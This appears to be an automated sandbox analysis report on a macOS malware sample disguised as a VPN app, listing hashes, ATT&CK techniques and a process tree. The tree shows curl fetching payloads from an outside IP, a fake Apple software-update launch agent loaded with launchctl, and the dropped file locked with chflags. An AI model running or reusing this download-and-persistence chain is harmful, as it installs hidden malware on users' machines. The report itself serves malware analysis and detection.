Resubmissions

07-11-2024 18:36

241107-w9c14sxcjh 10

Analysis

  • max time kernel: 77s
  • max time network: 147s
  • platform: macos-10.15_amd64
  • resource: macos-20241106-en
  • resource tags: arch:amd64, arch:i386, image:macos-20241106-en, kernel:19b77a, locale:en-us, os:macos-10.15-amd64, system
  • submitted: 07-11-2024 18:36

General

  • Target: vpn.app/Contents/MacOS/vpn
  • Size: 106KB
  • MD5: 6d6ee4e9054cd7886902cf5a4ed215fd
  • SHA1: b486104d58bd9e267ab761bfdaa7955942bebcb8
  • SHA256: 6f551940380e2a4d4db3c9b25e85ef9d3c7628dbb60994b0ec066024cd355d45
  • SHA512: 972a26cd02f96fccd71151cac3fa51afc1c72d89f51886b01e19022f978e6322cda601eb68085b2a35d1a8d600f7b225f65f5e37ef5b340c7ab3baf0d7eac888
  • SSDEEP: 1536:EI3I09nvBbpIBBRVOAUOaT1CYjLxdC1hngLLFTAI+uIMRDdcC:El0FvB6BRVGOteHC1hngLLFsI+LMRL

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol (1 TTPs, 2 IoCs)

    Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel.

  • Launch Agent (1 TTPs)

    Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.

  • Resource Forking (1 TTPs, 1 IoCs)

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

  • Launchctl (1 TTPs, 2 IoCs)

    Adversaries may abuse launchctl to execute commands or programs. Launchctl accepts subcommands on the command line, interactively, or redirected from standard input.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/MacOS/vpn\""
    PID:452
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/MacOS/vpn\""
      PID:452
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn
        PID:452
        • /bin/zsh
          /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn
          PID:453
          • /Users/run/vpn.app/Contents/MacOS/vpn
            /Users/run/vpn.app/Contents/MacOS/vpn
            PID:453
  • /bin/bash
    /bin/bash /Users/run/vpn.app/Contents/Resources/script
    PID:477
    • /usr/bin/uname
      uname -m
      PID:478
    • /bin/mkdir
      mkdir /Users/run/.androids
      PID:479
    • /usr/bin/curl
      curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated
      PID:480
    • /bin/chmod
      chmod a+x /Users/run/.androids/softwareupdated
      PID:502
    • /bin/chmod
      chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
      PID:503
    • /bin/launchctl
      launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
      PID:504
    • /bin/launchctl
      launchctl start softwareupdated
      PID:506
    • /Users/run/.androids/softwareupdated
      /Users/run/.androids/softwareupdated
      PID:507
    • /usr/bin/chflags
      chflags uchg /Users/run/.androids/softwareupdated
      PID:508
    • /usr/bin/curl
      curl -L http://46.137.201.254/covid -o /Users/run/covid
      PID:509
  • /usr/libexec/xpcproxy
    xpcproxy com.apple.nsurlstoraged
    PID:484
    • /usr/libexec/nsurlstoraged
      /usr/libexec/nsurlstoraged --privileged
      PID:484
  • /usr/libexec/xpcproxy
    xpcproxy softwareupdated
    PID:505
    • /Users/run/.androids/softwareupdated
      /Users/run/.androids/softwareupdated -D
      PID:505

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /var/db/nsurlstoraged/dafsaData.bin
    Filesize: 54KB
    MD5: 64f469698e53d0c828b7f90acd306082
    SHA1: bcc041b3849e1b0b4104ffeb46002207eeac54f3
    SHA256: d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd
    SHA512: a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f